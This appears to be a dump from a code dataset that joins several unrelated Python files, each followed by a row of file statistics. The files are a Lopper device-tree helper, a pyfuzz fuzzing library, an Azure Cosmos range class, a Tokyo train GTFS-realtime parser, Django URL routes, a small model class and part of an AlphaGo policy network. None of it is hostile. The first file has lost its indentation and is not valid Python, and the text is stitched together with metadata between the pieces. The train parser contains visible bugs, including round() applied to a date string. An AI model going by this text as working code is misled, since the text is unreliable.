# * SPDX-License-Identifier: BSD-3-Clause
# */
import struct
import sys
import types
import unittest
import os
import getopt
import re
import subprocess
import shutil
import ast
from pathlib import Path
from pathlib import PurePath
from io import StringIO
import contextlib
import importlib
from lopper import Lopper
from lopper import LopperFmt
from lopper_tree import LopperAction
from lopper_tree import LopperProp
from lopper_tree import LopperNode
from lopper_tree import LopperTree
from lopper_yaml import LopperYAML
import lopper
import json
from itertools import chain
# tests for a bit that is set, going fro 31 -> 0 from MSB to LSB
def check_bit_set(n, k):
if n & (1 << (k)):
return True
return False
def set_bit(value, bit):
return value | (1<<bit)
def clear_bit(value, bit):
return value & ~(1<<bit)
def chunks(l, n):
# For item i in a range that is a length of l,
for i in range(0, len(l), n):
# Create an index range for l of n items:
yield l[i:i+n]
def json_expand( node ):
debug = False
if debug:
print( "[DBG]: ========> json expanding node: %s" % node.name )
for p in node:
if p.pclass == 'json':
# save the original json, we may need it again
p.value_json = p.value
# this converts it to a list, but that's causing some
# issues with assumptions in the various _expand routines, so
# not doing this for now.
# p.value = p.value
phandle_index,field_count = p.phandle_params()
if debug:
print( ' -- json property: [%s] %s [%s]' % ([p],p.name,p.value) )
print( ' phandle info: %s %s' % (phandle_index,field_count) )
loaded_j = json.loads( p.value_json )
p.struct_value = loaded_j
p.list_value = []
if field_count:
for j in loaded_j:
if type(j) == list:
p.list_value = p.list_value + j
elif type(j) == dict:
vals = list(j.values())
p.list_list = p.list_value + vals
else:
p.list_value.append(j)
# dump the json elements
if debug:
print( " [%s] %s" % (type(loaded_j),loaded_j) )
for j in loaded_j:
if type(j) == list:
for jj in j:
print(" json list element: %s" % jj )
elif type(j) == dict:
for jj,kk in j.items():
print(" json dict element: key: %s: value: %s" % (jj,kk) )
if type(kk) == dict:
print( " nested dict" )
else:
print( " non-list: %s" % j )
def property_set( property_name, property_val, node, fdt=None ):
newprop = LopperProp( property_name, -1, None, property_val )
node += newprop
if fdt:
node.sync( fdt )
def node_ancestors_of_type( node, ctype ):
ret_nodes = []
p = node.parent
while p:
nt = p.type
if re.search( "reserved-memory", p.name ):
nt = [ "reserved-memory" ]
if ctype in nt:
ret_nodes.append( p )
p = p.parent
return ret_nodes
def node_ancestor_types( node ):
# The return list from this can be tested as such:
# simple_bus = "simple-bus" in chain(*node_types)
# to get a boolean result
#
ret_types = [ node.type ]
p = node.parent
while p:
nt = p.type
if re.search( "reserved-memory", p.name ):
nt = [ "reserved-memory" ]
if nt:
ret_types.append( nt )
p = p.parent
return ret_types
def includes( tree, include_prop ):
include_nodes = []
if include_prop:
includes = include_prop.value
# every other entry is a phandle
for ph in includes[::2]:
anode = tree.pnode( ph )
if anode:
include_nodes.append( anode )
return include_nodes
def node_accesses( tree, node ):
try:
access_list = node["access"].value
except:
access_list = []
accessed_nodes = []
if access_list:
# although the access list is decoded as a list, it is actually tuples, so we need
# to get every other entry as a phandle, not every one.
for ph in access_list[::2]:
anode = tree.pnode( ph )
if anode:
# print( "node access found: %s" % anode.abs_path )
accessed_nodes.append( anode )
return accessed_nodes
# returns True if a node is compatible with the passed string
# (or list of strings)
def is_compat( node, compat_string ):
try:
node_compat = node['compatible'].value
except:
return None
if type(compat_string) == list:
x = None
for c in compat_string:
if not x:
x = [item for item in node_compat if c in item]
else:
x = [item for item in node_compat if compat_string in item]
return x != []
# process cpus, and update their references appropriately
def cpu_refs( tree, cpu_prop, verbose = 0 ):
refd_cpus = []
if not cpu_prop:
return refd_cpus, refd_cpus
if verbose:
print( "[DBG]: lopper_lib: cpu_refs: processing %s" % cpu_prop )
cpu_prop_list = list( chunks(cpu_prop.value,3) )
sub_cpus_all = []
# loop through the nodes, we want to refcount the sub-cpu nodes
# and their parents, we'll delete anything that isn't used later.
for cpu_phandle, mask, mode in cpu_prop_list:
cpu_mask = mask
if verbose:
print( "[INFO]: cb cpu mask: %s" % hex(cpu_mask))
try:
cpu_node = tree.pnode(cpu_phandle)
except:
# couldn't find the node, skip
continue
sub_cpus = tree.subnodes( cpu_node, "cpu@.*" )
sub_cpus_all = sub_cpus + sub_cpus_all
if verbose:
print( "[INFO]: lopper_lib: cpu prop phandle: %s" % cpu_phandle )
print( "[INFO]: lopper_lib: cpu node: %s" % cpu_node )
print( "[INFO]: lopper_lib: sub cpus: %s" % sub_cpus )
# we'll now walk from 0 -> 31. Checking the mask to see if access is
# allowed. If it is allowed, we'll check to see if there's a sub-cpu at
# the same offset. If so, we refcount it AND the parent. For sub-cpus
# that are available, but have no access, we log them to be delete later
# (we don't delete them now, since it will shift node numbers.
for idx in range( 0, 32 ):
if check_bit_set( cpu_mask, idx ):
try:
sub_cpu_node = sub_cpus[idx]
# refcount it AND the parent
tree.ref_all( sub_cpu_node, True )
refd_cpus.append( sub_cpu_node )
except:
pass
unrefd_cpus = []
for s in sub_cpus_all:
if s not in refd_cpus:
try:
unrefd_cpus.append( s )
except Exception as e:
print( "[WARNING]: %s" % e )
# you can globally check for ref'd cpus after calling this routine
# via:
# ref_nodes = tree.refd( "/cpus.*/cpu.*" )
return refd_cpus, unrefd_cpus
| 29.606178 | 93 | 0.551643 | 1,030 | 7,668 | 3.983495 | 0.261165 | 0.017061 | 0.012186 | 0.019498 | 0.114063 | 0.084816 | 0.084816 | 0.073117 | 0.046308 | 0.034609 | 0 | 0.004675 | 0.358372 | 7,668 | 258 | 94 | 29.72093 | 0.829268 | 0.21505 | 0 | 0.233918 | 0 | 0 | 0.083793 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.070175 | false | 0.005848 | 0.146199 | 0.011696 | 0.28655 | 0.081871 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
fa00467dbd578d27792ea26c026206d93da1db4d | 4,325 | py | Python | src/pyfuzz/fuzzers.py | fabriceyhc/pyfuzz | 67f8bd844f63139ca8f795b2bc6e30a419fa037e | [
"MIT"
] | null | null | null | src/pyfuzz/fuzzers.py | fabriceyhc/pyfuzz | 67f8bd844f63139ca8f795b2bc6e30a419fa037e | [
"MIT"
] | null | null | null | src/pyfuzz/fuzzers.py | fabriceyhc/pyfuzz | 67f8bd844f63139ca8f795b2bc6e30a419fa037e | [
"MIT"
] | null | null | null | import random
from pyfuzz.runners import *
class Fuzzer(object):
def __init__(self):
pass
def fuzz(self):
"""Return fuzz input"""
return ""
def run(self, runner=Runner()):
"""Run `runner` with fuzz input"""
return runner.run(self.fuzz())
def runs(self, runner=PrintRunner(), trials=10):
"""Run `runner` with fuzz input, `trials` times"""
# Note: the list comprehension below does not invoke self.run() for subclasses
# return [self.run(runner) for i in range(trials)]
outcomes = []
for i in range(trials):
outcome = self.run(runner)
if outcome[1] == runner.FAIL:
self.failure_cases.append(self.inp)
outcomes.append(outcome)
return outcomes
class RandomFuzzer(Fuzzer):
def __init__(self,
min_length=10,
max_length=100,
char_start=32,
char_range=32):
"""Produce strings of `min_length` to `max_length` characters
in the range [`char_start`, `char_start` + `char_range`]"""
self.min_length = min_length
self.max_length = max_length
self.char_start = char_start
self.char_range = char_range
def fuzz(self):
string_length = random.randrange(self.min_length, self.max_length + 1)
out = ""
for i in range(0, string_length):
out += chr(random.randrange(self.char_start,
self.char_start + self.char_range))
return out
class MutationFuzzer(Fuzzer):
def __init__(self, seed, min_mutations=2, max_mutations=10, mutator=lambda x: x):
self.seed = seed
self.min_mutations = min_mutations
self.max_mutations = max_mutations
self.mutator = mutator
self.reset()
def reset(self):
self.failure_cases = []
self.population = self.seed
self.seed_index = 0
def mutate(self, inp):
return self.mutator(inp)
def create_candidate(self):
candidate = random.choice(self.population)
iters = random.randint(self.min_mutations, self.max_mutations)
for i in range(iters):
candidate = self.mutate(candidate)
return candidate
def fuzz(self):
if self.seed_index < len(self.seed):
# Still seeding
self.inp = self.seed[self.seed_index]
self.seed_index += 1
else:
# Mutating
self.inp = self.create_candidate()
return self.inp
class MutationCoverageFuzzer(MutationFuzzer):
def reset(self):
super().reset()
self.coverages_seen = set()
# Now empty; we fill this with seed in the first fuzz runs
self.population = []
def run(self, runner):
"""Run function(inp) while tracking coverage.
If we reach new coverage,
add inp to population and its coverage to population_coverage
"""
result, outcome = super().run(runner)
new_coverage = frozenset(runner.coverage())
if outcome == Runner.PASS and new_coverage not in self.coverages_seen:
# We have new coverage
self.population.append(self.inp)
self.coverages_seen.add(new_coverage)
return result
if __name__ == '__main__':
print("== RandomFuzzer " + "=" * 50)
random_fuzzer = RandomFuzzer(min_length=20, max_length=20)
for i in range(10):
print(random_fuzzer.fuzz())
print("== MutationLineCoverageFuzzer " + "=" * 50)
from pyfuzz.test_programs import cgi_decode
from pyfuzz.string_mutations import mutate_strings
from pyfuzz.byte_mutations import mutate_bytes
from pyfuzz.runners import *
seed = ["Hello World"]
cgi_runner = FunctionLineCoverageRunner(cgi_decode)
m = MutationCoverageFuzzer(seed, mutator=mutate_strings)
results = m.runs(cgi_runner, 10000)
print(m.population)
print(cgi_runner.coverage())
print("== MutationBranchCoverageFuzzer " + "=" * 50)
seed = ["Hello World"]
cgi_runner = FunctionBranchCoverageRunner(cgi_decode)
m = MutationCoverageFuzzer(seed, mutator=mutate_strings)
results = m.runs(cgi_runner, 10)
print(m.population)
print(cgi_runner.coverage()) | 32.276119 | 86 | 0.617341 | 507 | 4,325 | 5.094675 | 0.250493 | 0.027875 | 0.011614 | 0.021293 | 0.215641 | 0.089044 | 0.089044 | 0.059621 | 0.059621 | 0.059621 | 0 | 0.012242 | 0.282312 | 4,325 | 134 | 87 | 32.276119 | 0.81991 | 0.130867 | 0 | 0.157895 | 0 | 0 | 0.030106 | 0.014646 | 0 | 0 | 0 | 0 | 0 | 1 | 0.136842 | false | 0.021053 | 0.063158 | 0.010526 | 0.326316 | 0.084211 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
fa0678f5b57ca66a4b64174af45a0a45f7a432a4 | 4,332 | py | Python | sdk/cosmos/azure-cosmos/azure/cosmos/_routing/routing_range.py | jiasli/azure-sdk-for-python | f700299c45cea44064d5156f2bfe3664284f6da4 | [
"MIT"
] | null | null | null | sdk/cosmos/azure-cosmos/azure/cosmos/_routing/routing_range.py | jiasli/azure-sdk-for-python | f700299c45cea44064d5156f2bfe3664284f6da4 | [
"MIT"
] | null | null | null | sdk/cosmos/azure-cosmos/azure/cosmos/_routing/routing_range.py | jiasli/azure-sdk-for-python | f700299c45cea44064d5156f2bfe3664284f6da4 | [
"MIT"
] | null | null | null | #The MIT License (MIT)
#Copyright (c) 2014 Microsoft Corporation
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
"""Internal class for partition key range implementation in the Azure Cosmos database service.
"""
class PartitionKeyRange(object):
"""Partition Key Range Constants"""
MinInclusive = 'minInclusive'
MaxExclusive = 'maxExclusive'
Id = 'id'
Parents = 'parents'
class Range(object):
"""description of class"""
MinPath = 'min'
MaxPath = 'max'
IsMinInclusivePath = 'isMinInclusive'
IsMaxInclusivePath = 'isMaxInclusive'
def __init__(self, range_min, range_max, isMinInclusive, isMaxInclusive):
if range_min is None:
raise ValueError("min is missing")
if range_max is None:
raise ValueError("max is missing")
self.min = range_min
self.max = range_max
self.isMinInclusive = isMinInclusive
self.isMaxInclusive = isMaxInclusive
def contains(self, value):
minToValueRelation = self.min > value
maxToValueRelation = self.max > value
return ((self.isMinInclusive and minToValueRelation <= 0) or \
(not self.isMinInclusive and minToValueRelation < 0)) \
and ((self.isMaxInclusive and maxToValueRelation >= 0) \
or (not self.isMaxInclusive and maxToValueRelation > 0))
@classmethod
def PartitionKeyRangeToRange(cls, partition_key_range):
self = cls(partition_key_range[PartitionKeyRange.MinInclusive], partition_key_range[PartitionKeyRange.MaxExclusive],
True, False)
return self
@classmethod
def ParseFromDict(cls, range_as_dict):
self = cls(range_as_dict[Range.MinPath], range_as_dict[Range.MaxPath], range_as_dict[Range.IsMinInclusivePath], range_as_dict[Range.IsMaxInclusivePath])
return self
def isSingleValue(self):
return self.isMinInclusive and self.isMaxInclusive and self.min == self.max
def isEmpty(self):
return (not (self.isMinInclusive and self.isMaxInclusive)) and self.min == self.max
def __hash__(self):
return hash((self.min, self.max, self.isMinInclusive, self.isMaxInclusive))
def __str__(self):
return (('[' if self.isMinInclusive else '(') + str(self.min) + ',' + str(self.max) + (']' if self.isMaxInclusive else ')'))
def __eq__(self, other):
return (self.min == other.min) and (self.max == other.max) \
and (self.isMinInclusive == other.isMinInclusive) \
and (self.isMaxInclusive == other.isMaxInclusive)
@staticmethod
def _compare_helper(a,b):
# python 3 compatible
return (a > b) - (a < b)
@staticmethod
def overlaps(range1, range2):
if range1 is None or range2 is None: return False
if range1.isEmpty() or range2.isEmpty(): return False
cmp1 = Range._compare_helper(range1.min, range2.max)
cmp2 = Range._compare_helper(range2.min, range1.max)
if (cmp1 <= 0 or cmp2 <= 0):
if ((cmp1 == 0 and not(range1.isMinInclusive and range2.isMaxInclusive)) or (cmp2 == 0 and not(range2.isMinInclusive and range1.isMaxInclusive))):
return False
return True
return False
| 40.111111 | 160 | 0.677978 | 518 | 4,332 | 5.584942 | 0.312741 | 0.030418 | 0.029381 | 0.022122 | 0.096094 | 0.040788 | 0.040788 | 0.040788 | 0.040788 | 0.040788 | 0 | 0.009976 | 0.23638 | 4,332 | 107 | 161 | 40.485981 | 0.864571 | 0.283934 | 0 | 0.131148 | 0 | 0 | 0.032595 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.180328 | false | 0 | 0 | 0.098361 | 0.540984 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
fa0688c2fdb5c7ce86d666b23ecb33de31238197 | 11,427 | py | Python | trains_realtime.py | chuwyton/TokyoGTFS | f4f7d2063858510bdf43f013049ffd27c4f4543c | [
"CC-BY-4.0"
] | null | null | null | trains_realtime.py | chuwyton/TokyoGTFS | f4f7d2063858510bdf43f013049ffd27c4f4543c | [
"CC-BY-4.0"
] | null | null | null | trains_realtime.py | chuwyton/TokyoGTFS | f4f7d2063858510bdf43f013049ffd27c4f4543c | [
"CC-BY-4.0"
] | null | null | null | from google.transit import gtfs_realtime_pb2 as gtfs_rt
from datetime import datetime, date, timedelta
import argparse
import requests
import zipfile
import iso8601
import ijson
import time
import pytz
import csv
import io
import os
__title__ = "TokyoGTFS: Trains-Realtime"
__author__ = "Mikołaj Kuranowski"
__email__ = "mikolaj@mkuran.pl"
__license__ = "CC BY 4.0"
EFFECTS = {
"運転見合わせ": 1, "運転被約": 2, "遅延": 3, "運行情報あり": 6, "お知らせ": 6, "直通運転中止": 1
}
CAUSES = {
"車両点検": 9, "車輪空転": 3, "大雨": 8, "大雪": 8, "地震": 6, "線路に支障物": 6, "シカと衝突": 6,
"接続待合せ": 3, "異音の確認": 3, "架線点検": 3, "踏切に支障物": 6
}
class TrainRealtime:
def __init__(self, apikey, gtfs_arch="tokyo_trains.zip"):
self.apikey = apikey
self.timezone = pytz.timezone("Asia/Tokyo")
self.active_routes = set()
self.active_operators = set()
# Get list of active routes
with open("data/train_routes.csv", mode="r", encoding="utf8", newline="") as buff:
for row in csv.DictReader(buff):
self.active_routes.add(row["route_id"])
self.active_operators.add(row["operator"])
# Get map realtime_trip_id → trip_id
self.trip_map_date = datetime.now(tz=self.timezone).strftime("%Y%m%d")
self.trip_map = {}
with zipfile.ZipFile(gtfs_arch, mode="r") as arch:
# Get active calendars
with arch.open("calendar_dates.txt") as buff:
reader = csv.DictReader(io.TextIOWrapper(buff, encoding="utf8", newline=""))
active_services = {i["service_id"] for i in reader if i["date"] == self.trip_map_date}
# Map train_id → trip_id
with arch.open("trips.txt") as buff:
reader = csv.DictReader(io.TextIOWrapper(buff, encoding="utf8", newline=""))
for row in reader:
if row["service_id"] in active_services and row["train_realtime_id"]:
if row["train_realtime_id"] not in self.trip_map:
self.trip_map[row["train_realtime_id"]] = []
self.trip_map[row["train_realtime_id"]].append(row["trip_id"])
def delays(self, container):
now = datetime.now(tz=self.timezone)
if self.trip_map_date != now.strftime("%Y%m%d"):
self.__init__()
trains_req = requests.get("https://api-tokyochallenge.odpt.org/api/v4/odpt:Train", params={"acl:consumerKey": self.apikey}, timeout=60, stream=True)
trains_req.raise_for_status()
#trains = ijson.items(trains_req.raw, "item")
trains = trains_req.json()
for train in trains:
train_id = train["owl:sameAs"].split(":")[1]
trips = self.trip_map.get(train_id, [])
# Assume the train maps to some trip
if not trips:
continue
# Load some info about train
delay = train.get("odpt:delay")
current_stop = train.get("odpt:fromStation")
next_stop = train.get("odpt:toStation")
route = train["odpt:railway"].split(":")[1]
update_timestamp = round(iso8601.parse_date(train["dc:date"]).timestamp())
# Be sure data is not too old
if "dct:valid" in train:
if now > iso8601.parse_date(train["dct:valid"]):
continue
# Make sure we have info about delay/current stop
if delay == None or current_stop == None:
continue
for trip_id in trips:
trip_belongs_to_current_route = trip_id.split(".")[1] == route.split(".")[1]
entity = container.entity.add()
entity.id = train["@id"] + "/" + trip_id
if delay != None:
trip_update = entity.trip_update
trip_update.trip.trip_id = trip_id
trip_update.delay = delay
trip_update.timestamp = update_timestamp
if next_stop and trip_belongs_to_current_route:
vehicle = entity.vehicle
vehicle.trip.trip_id = trip_id
vehicle.stop_id = next_stop.split(":")[1]
vehicle.current_status = 2
vehicle.timestamp = update_timestamp
elif current_stop and trip_belongs_to_current_route:
vehicle = entity.vehicle
vehicle.trip.trip_id = trip_id
vehicle.stop_id = current_stop.split(":")[1]
vehicle.current_status = 1
vehicle.timestamp = update_timestamp
return container
def alerts(self, container):
alerts_req = requests.get("https://api-tokyochallenge.odpt.org/api/v4/odpt:TrainInformation", params={"acl:consumerKey": self.apikey}, timeout=60, stream=True)
alerts_req.raise_for_status()
#alerts = ijson.items(akerts_req.raw, "item")
alerts = alerts_req.json()
for alert in alerts:
# Load basic info about the alert
operator = alert["odpt:operator"].split(":")[1]
route = alert["odpt:railway"].split(":")[1] if "odpt:railway" in alert else ""
# Load info about validaty time
start_time = round(iso8601.parse_date(alert["odpt:timeOfOrigin"]).timestamp()) if "odpt:timeOfOrigin" in alert else None
end_time = round(iso8601.parse_date(alert["dct:valid"]).timestamp()) if "dct:valid" in alert else None
recovery_time = round(iso8601.parse_date(alert["odpt:resumeEstimate"]).strftime("%Y-%m-%d %H:%M")) if "odpt:resumeEstimate" in alert else None
# Ignore alerts that denote normal service status
if alert.get("odpt:trainInformationStatus") == None or \
alert.get("odpt:trainInformationStatus", {}).get("ja", "平常") == "平常":
continue
# Ignore alerts for inactive operators and inactive routes
if operator not in self.active_operators or (route and route not in self.active_routes):
continue
# Data
cause = alert.get("odpt:trainInformationCauseTitle", {}) or alert.get("odpt:trainInformationCause", {})
direction = alert.get("odpt:trainInformationLineTitle", {}) or alert.get("odpt:trainInformationLine", {})
area = alert.get("odpt:trainInformationAreaTitle", {}) or alert.get("odpt:trainInformationArea", {})
# Create GTFS-RT entity
entity = container.entity.add()
entity.id = alert["@id"]
# Add info about alerted routes
informed = entity.alert.informed_entity.add()
if not route: informed.agency_id = operator
else: informed.route_id = route
# Load info about validaty time
if start_time or end_time: period = entity.alert.active_period.add()
if start_time: period.start = start_time
if end_time: period.end = end_time
# Try to guess the cause and effect, defaulting to UNKNOWN_CAUSE and UNKNOWN_EFFECT
entity.alert.cause = CAUSES.get(cause.get("ja", ""), 1)
entity.alert.effect = EFFECTS.get(alert.get("odpt:trainInformationStatus", {}).get("ja", ""), 8)
# Get alert header
header_ja = alert["odpt:trainInformationStatus"]["ja"]
translation = entity.alert.header_text.translation.add()
translation.language, translation.text = "ja", header_ja
if "en" in alert["odpt:trainInformationStatus"]:
translation = entity.alert.header_text.translation.add()
translation.language, translation.text = "en", alert["odpt:trainInformationStatus"]["en"]
# Contrusct alert body
# Append main info
ja_body, en_body = alert["odpt:trainInformationText"]["ja"], alert["odpt:trainInformationText"].get("en", "")
ja_body += "\n\n"
if en_body: en_body += "\n\n"
# Add cause, if it's defined
if "ja" in cause: ja_body += "発生理由:" + cause["ja"] + "\n"
if "en" in cause: en_body += "Cause: " + cause["en"] + "\n"
# Add direction, if it's defined
if "ja" in direction: ja_body += "列車の運転方向:" + direction["ja"] + "\n"
if "en" in direction: en_body += "Direction: " + direction["en"] + "\n"
# Add affected area, if it's defined
if "ja" in area: ja_body += "発生エリア:" + area["ja"] + "\n"
if "en" in area: en_body += "Affected area: " + area["en"] + "\n"
# Add recovery time, if it's defined
if recovery_time:
ja_body += "復旧見込み時刻:" + recovery_time + "\n"
en_body += "Estimated Recovery Time: " + recovery_time + "\n"
# Add body to alert
translation = entity.alert.description_text.translation.add()
translation.language, translation.text = "ja", ja_body.strip()
if en_body:
translation = entity.alert.description_text.translation.add()
translation.language, translation.text = "en", en_body.strip()
return container
def parse(self, human_readable=False):
container = gtfs_rt.FeedMessage()
header = container.header
header.gtfs_realtime_version = "2.0"
header.incrementality = 0
header.timestamp = round(datetime.today().timestamp())
container = self.delays(container)
container = self.alerts(container)
mode = "w" if human_readable else "wb"
with open("tokyo_trains_rt.pb", mode=mode) as f:
if human_readable: f.write(str(container))
else: f.write(container.SerializeToString())
if __name__ == "__main__":
args_parser = argparse.ArgumentParser()
args_parser.add_argument("-a", "--apikey", metavar="YOUR-APIKEY", help="apikey from developer-tokyochallenge.odpt.org")
args_parser.add_argument("-g", "--gtfs", metavar="PATH-TO-TRAINS-GTFS.zip", default="tokyo_trains.zip", help="path to GTFS created by trains_gtfs.py")
args_parser.add_argument("-hr", "--human-readable", action="store_true", help="output gtfs-realtime file as human-readable instead of binary")
args = args_parser.parse_args()
if args.apikey:
apikey = args.apikey
elif os.path.exists("apikey.txt"):
with open("apikey.txt", mode="r", encoding="utf8") as f:
apikey = f.read().strip()
else:
raise RuntimeError("No apikey!\n Provide it inside command line argument '--apikey',\n Or put it inside a file named 'apikey.txt'.")
start_time = time.time()
print("""
| _____ _ ____ _____ _____ ____ |
| |_ _|__ | | ___ _ ___ / ___|_ _| ___/ ___| |
| | |/ _ \| |/ / | | |/ _ \| | _ | | | |_ \___ \ |
| | | (_) | <| |_| | (_) | |_| | | | | _| ___) | |
| |_|\___/|_|\_\\\\__, |\___/ \____| |_| |_| |____/ |
| |___/ |
""")
print("=== Trains GTFS-RT: Starting! ===")
parser = TrainRealtime(apikey=apikey, gtfs_arch=args.gtfs)
parser.parse(human_readable=args.human_readable)
total_time = time.time() - start_time
print("=== TokyoGTFS: Finished in {} s ===".format(round(total_time, 2)))
| 44.290698 | 167 | 0.581868 | 1,330 | 11,427 | 4.784211 | 0.222556 | 0.012258 | 0.016973 | 0.011315 | 0.231337 | 0.19802 | 0.161559 | 0.13327 | 0.132013 | 0.116612 | 0 | 0.008605 | 0.28809 | 11,427 | 257 | 168 | 44.463035 | 0.773325 | 0.075873 | 0 | 0.116022 | 0 | 0.027624 | 0.205374 | 0.043297 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022099 | false | 0 | 0.066298 | 0 | 0.104972 | 0.016575 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
fa06ed62e14d3d18ab004066054a101e574b0878 | 396 | py | Python | browser/urls.py | ziotom78/litebird_imo | 94cc93543afc2d6e22395ebd7382c4139fa14927 | [
"Unlicense"
] | null | null | null | browser/urls.py | ziotom78/litebird_imo | 94cc93543afc2d6e22395ebd7382c4139fa14927 | [
"Unlicense"
] | null | null | null | browser/urls.py | ziotom78/litebird_imo | 94cc93543afc2d6e22395ebd7382c4139fa14927 | [
"Unlicense"
] | null | null | null | from django.urls import path
from . import views
urlpatterns = [
path("", views.EntityTypeListView.as_view(), name="index"),
path("entity_types/<int:pk>/", views.EntityTypeView.as_view(), name="entity_type_detail"),
path("entity/<str:pk>/", views.EntityView.as_view(), name="entity_detail"),
path("data_file/<str:pk>/", views.DataFileView.as_view(), name="data_file_detail"),
]
| 36 | 94 | 0.70202 | 53 | 396 | 5.037736 | 0.45283 | 0.089888 | 0.149813 | 0.11985 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106061 | 396 | 10 | 95 | 39.6 | 0.754237 | 0 | 0 | 0 | 0 | 0 | 0.275253 | 0.055556 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
fa07962a2a6a8d368d731f3161674d8005dd3f38 | 873 | py | Python | src/models/measure.py | ja573/metrics-api | cd1bf46dd5d015f562ce2020519484c19db10e3e | [
"MIT"
] | 1 | 2019-08-20T10:25:28.000Z | 2019-08-20T10:25:28.000Z | src/models/measure.py | ja573/metrics-api | cd1bf46dd5d015f562ce2020519484c19db10e3e | [
"MIT"
] | 6 | 2019-05-21T17:07:03.000Z | 2020-12-10T13:01:07.000Z | src/models/measure.py | ja573/metrics-api | cd1bf46dd5d015f562ce2020519484c19db10e3e | [
"MIT"
] | 1 | 2019-08-08T14:28:45.000Z | 2019-08-08T14:28:45.000Z | from api import db
from .queries import do_query, dbcheck
class Measure():
def __init__(self, measure_uri, namespace, source, mtype, version):
self.measure_uri = measure_uri
self.namespace = namespace
self.source = source
self.type = mtype
self.version = version
def load_description(self):
description = self.get_description()
self.description = description.list() if description else []
def get_description(self):
options = dict(uri=self.measure_uri)
q = '''SELECT locale_code, locale_name, description
FROM measure_description INNER JOIN locale USING(locale_code)
WHERE measure_uri = $uri
ORDER BY locale_code;'''
return do_query(q, options)
@staticmethod
@dbcheck
def get_all():
return db.select('measure')
| 30.103448 | 76 | 0.642612 | 101 | 873 | 5.356436 | 0.405941 | 0.092421 | 0.077634 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.274914 | 873 | 28 | 77 | 31.178571 | 0.85466 | 0 | 0 | 0 | 0 | 0 | 0.234822 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.173913 | false | 0 | 0.086957 | 0.043478 | 0.391304 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
fa086ab24f02d8df0570374d9cec85eb1ae2e56f | 13,493 | py | Python | AlphaGo/models/policy.py | vftens/RocAlphaGo-aug25-keras2-py35 | 67ad5242ea7a8cdda60b9e10590f7bc9e91447c6 | [
"MIT"
] | null | null | null | AlphaGo/models/policy.py | vftens/RocAlphaGo-aug25-keras2-py35 | 67ad5242ea7a8cdda60b9e10590f7bc9e91447c6 | [
"MIT"
] | null | null | null | AlphaGo/models/policy.py | vftens/RocAlphaGo-aug25-keras2-py35 | 67ad5242ea7a8cdda60b9e10590f7bc9e91447c6 | [
"MIT"
] | null | null | null | from keras.models import Sequential, Model
from keras.layers import Input, BatchNormalization, Conv2D
from keras.layers.merge import add
from keras.layers.core import Activation, Flatten
from AlphaGo.util import flatten_idx
from AlphaGo.models.nn_util import Bias, NeuralNetBase, neuralnet
import numpy as np
@neuralnet
class CNNPolicy(NeuralNetBase):
"""uses a convolutional neural network to evaluate the state of the game
and compute a probability distribution over the next action
"""
def _select_moves_and_normalize(self, nn_output, moves, size):
"""helper function to normalize a distribution over the given list of moves
and return a list of (move, prob) tuples
"""
if len(moves) == 0:
return []
move_indices = [flatten_idx(m, size) for m in moves]
# get network activations at legal move locations
distribution = nn_output[move_indices]
distribution = distribution / distribution.sum()
return list(zip(moves, distribution))
